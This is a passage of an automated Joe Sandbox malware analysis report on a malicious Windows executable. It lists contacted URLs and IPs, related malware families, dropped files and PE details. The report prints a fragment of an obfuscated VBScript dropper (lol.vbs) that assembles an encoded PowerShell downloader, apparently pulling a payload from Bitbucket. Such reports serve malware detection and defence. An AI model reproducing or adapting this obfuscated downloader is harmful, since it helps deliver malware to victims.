                                                    https://bitbucket.org/gateway/api/emoji/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://bqlf8qjztdtr.statuspage.iopowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2211178390.000001DB2C6DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bitbucket.orgpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fdfghd%2Ffgd%2powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC9B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218ACB58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://id.atlassian.com/loginpowershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/jsi18n/en/djpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://go.micropowershell.exe, 00000007.00000002.2175735528.00000218AC09A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB8EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://id.atlassian.com/logoutpowershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://contoso.com/Iconpowershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000007.00000002.2175735528.00000218ACB7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218ACB58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://id.atlassian.com/manage-profile/powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/dist/webpackpowershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://crl.mpowershell.exe, 00000007.00000002.2202729046.00000218C34F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://cdn.cookielaw.org/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=dpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/themes/apowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://aka.ms/pscore68powershell.exe, 00000005.00000002.2211178390.000001DB2C6AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                185.166.143.49
                                                                                                                		bitbucket.orgGermany
                                                                                                                		16509AMAZON-02USfalse

                                                                                                                General Information

                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                Analysis ID:1604514
                                                                                                                Start date and time:2025-02-01 16:42:49 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 3m 9s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:00wVZ1NU5b.exe
                                                                                                                renamed because original name is a hash value
                                                                                                                Original Sample Name:a11a8da90ad22616ca604476cb9f2749.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.expl.evad.winEXE@12/8@1/1
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 33.3%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 32
                                                                                                                • Number of non-executed functions: 36
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Stop behavior analysis, all processes terminated

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.61
                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 5936 because it is empty
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6568 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                10:43:44API Interceptor35x Sleep call for process: powershell.exe modified

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • jasonj002.bitbucket.io/

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                bitbucket.orgSet-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 185.166.143.48
                                                                                                                good.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                • 185.166.143.48
                                                                                                                phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                • 185.166.143.48
                                                                                                                phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                • 185.166.143.50
                                                                                                                https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.comGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                • 185.166.143.48
                                                                                                                https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.plGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                • 185.166.143.50
                                                                                                                https://nuance-pdf-professional2.software.informer.com/7.2/Get hashmaliciousUnknownBrowse
                                                                                                                • 185.166.143.50
                                                                                                                atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                • 185.166.143.48
                                                                                                                invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                • 185.166.143.49
                                                                                                                invoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                • 185.166.143.50

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                AMAZON-02UShidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                • 34.249.145.219
                                                                                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 35.166.240.123
                                                                                                                nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 54.228.112.49
                                                                                                                nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 52.192.181.160
                                                                                                                splarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 100.21.34.234
                                                                                                                nklarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 52.16.208.59
                                                                                                                nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 108.138.142.61
                                                                                                                splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 64.186.3.199
                                                                                                                jklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 108.131.187.27
                                                                                                                jklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 35.73.110.239

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0egivemebestoutputwithfreemindgoodforentiregood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                • 185.166.143.49
                                                                                                                nicegirlgivenmebestthingswithentiretimegoodfor.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 185.166.143.49
                                                                                                                WNqzT7mxfC.lnkGet hashmaliciousUnknownBrowse
                                                                                                                • 185.166.143.49
                                                                                                                file.lnkGet hashmaliciousUnknownBrowse
                                                                                                                • 185.166.143.49
                                                                                                                http://upholdil-ogin.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 185.166.143.49
                                                                                                                dn0uAKsZoo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                • 185.166.143.49
                                                                                                                CD4QsBaOy9.lnkGet hashmaliciousUnknownBrowse
                                                                                                                • 185.166.143.49
                                                                                                                6qLEfplqi1.lnkGet hashmaliciousUnknownBrowse
                                                                                                                • 185.166.143.49
                                                                                                                20Y8DUj1qE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 185.166.143.49
                                                                                                                R4j1Xy3WCg.lnkGet hashmaliciousUnknownBrowse
                                                                                                                • 185.166.143.49

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):0.773832331134527
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:NlllulE///:NllUE
                                                                                                                MD5:B4DE26A7324FA4FC327B4F25179DA553
                                                                                                                SHA1:D6B1969ABA866CB1D66F0E07807274B88F4D066B
                                                                                                                SHA-256:03265D17C846083859005C1B74486351E2AB14BE6B7DA58B94DDAC870C2A6637
                                                                                                                SHA-512:A525B72C79098A88E461554A020D0424A024CD18466AB87E98CAF26C2E99BC264C39E2607A7444FBEC0A041DE588A69266B4F3C4F89D681DA41264E966145D8F
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:@...e...........................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\00wVZ1NU5b.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):15054
                                                                                                                Entropy (8bit):5.4299718814514195
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:Kn+mfSZHNCjlcMWY/YinblBmnAbYXhMgE732JCjc7NF9Wu0MDxpnO/9SjozM:K+I08gib/mAbYXy29v10MFpWSjoA
                                                                                                                MD5:B12BAE993C0BA4C1A05610AD2C5D77F8
                                                                                                                SHA1:9083D25DDE4D8BFA0CFE5198760321A1281ADAEF
                                                                                                                SHA-256:671C8F1262CFA0155AC7DEC62780A141061889E4F1E14429615C528121EF881C
                                                                                                                SHA-512:B99534FF8EC410C9BE0879AD0147065ABB72756CA400C033B78266CD1E44BCDE47DB531DC199CE34C4474099EA59146BB5CF4A18274FB8A4C3002AD21D6A86AC
                                                                                                                Malicious:true
                                                                                                                Preview: 'g..SriiIehmrgm = rRegisggfgdsadffghgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..Call Ugsfisging("$do" & "sigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@")..Call Ugsfisging("UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@")..omahmdS = TimeSerial(8,8,8)..Public Const grhroopc = "ArmeFockf"..oSrodfok = "hffhfg" & LenB("pnkAhrc") & "hfg"..'dAIagSk aImckdrgp..kjIImjj = TimeSerial(7,9,9)..Public Const cmrbSbA = "dpSiiSdc"..Call Ugsfisging("dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@")..Call Ugsfisging("DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgB")..Call Ugsfisging("s@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hvtwsds.5oy.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sa0zeae.0ck.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edgai1pe.b2s.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phu4hbxa.ujn.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qadm4c5e.rng.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugxesqtf.koj.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Entropy (8bit):6.4375581583443795
                                                                                                                TrID:
                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:00wVZ1NU5b.exe
                                                                                                                File size:180'224 bytes
                                                                                                                MD5:a11a8da90ad22616ca604476cb9f2749
                                                                                                                SHA1:a877ecdacdda321bfd73ecd8b18584725fd11cbb
                                                                                                                SHA256:e52a775c02065896cacd99b1f7141c40aea77edc9fdbbfa69b900ce1c050d62c
                                                                                                                SHA512:f75731183ea8b390c3ae47de480f7e27e7beadd3908e8b2c9cf1684197827bdb42fd44e62fb2e5a8b121abfe4bca93d871f3d1ab6701114b911e77ffac884c1c
                                                                                                                SSDEEP:3072:+HwrxmMpvDITZg1SK5GWp1icKAArDZz4N9GhbkrNEk1dr:xrMZkp0yN90QEW
                                                                                                                TLSH:C3048D0A67E520A6E4B6677498F203835A317CB26B7492FF13C4D57E0E336D0A532B57
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"

                                                                                                                File Icon

                                                                                                                Icon Hash:3b6120282c4c5a1f

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x140008460
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x140000000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:10
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:10
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:10
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                dec eax
                                                                                                                sub esp, 28h
                                                                                                                call 00007FE1FC7FE9D0h
                                                                                                                dec eax
                                                                                                                add esp, 28h
                                                                                                                jmp 00007FE1FC7FE24Bh
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                dec eax
                                                                                                                mov dword ptr [esp+08h], ebx
                                                                                                                dec eax
                                                                                                                mov dword ptr [esp+10h], edi
                                                                                                                inc ecx
                                                                                                                push esi
                                                                                                                dec eax
                                                                                                                sub esp, 000000B0h
                                                                                                                and dword ptr [esp+20h], 00000000h
                                                                                                                dec eax
                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                call dword ptr [00000F8Dh]
                                                                                                                nop
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [00000030h]
                                                                                                                dec eax
                                                                                                                mov ebx, dword ptr [eax+08h]
                                                                                                                xor edi, edi
                                                                                                                xor eax, eax
                                                                                                                dec eax
                                                                                                                cmpxchg dword ptr [000046C2h], ebx
                                                                                                                je 00007FE1FC7FE24Ch
                                                                                                                dec eax
                                                                                                                cmp eax, ebx
                                                                                                                jne 00007FE1FC7FE25Fh
                                                                                                                mov edi, 00000001h
                                                                                                                mov eax, dword ptr [000046B8h]
                                                                                                                cmp eax, 01h
                                                                                                                jne 00007FE1FC7FE25Ch
                                                                                                                lea ecx, dword ptr [eax+1Eh]
                                                                                                                call 00007FE1FC7FE863h
                                                                                                                jmp 00007FE1FC7FE2C9h
                                                                                                                mov ecx, 000003E8h
                                                                                                                call dword ptr [00000F3Bh]
                                                                                                                jmp 00007FE1FC7FE206h
                                                                                                                mov eax, dword ptr [00004693h]
                                                                                                                test eax, eax
                                                                                                                jne 00007FE1FC7FE2A5h
                                                                                                                mov dword ptr [00004685h], 00000001h
                                                                                                                dec esp
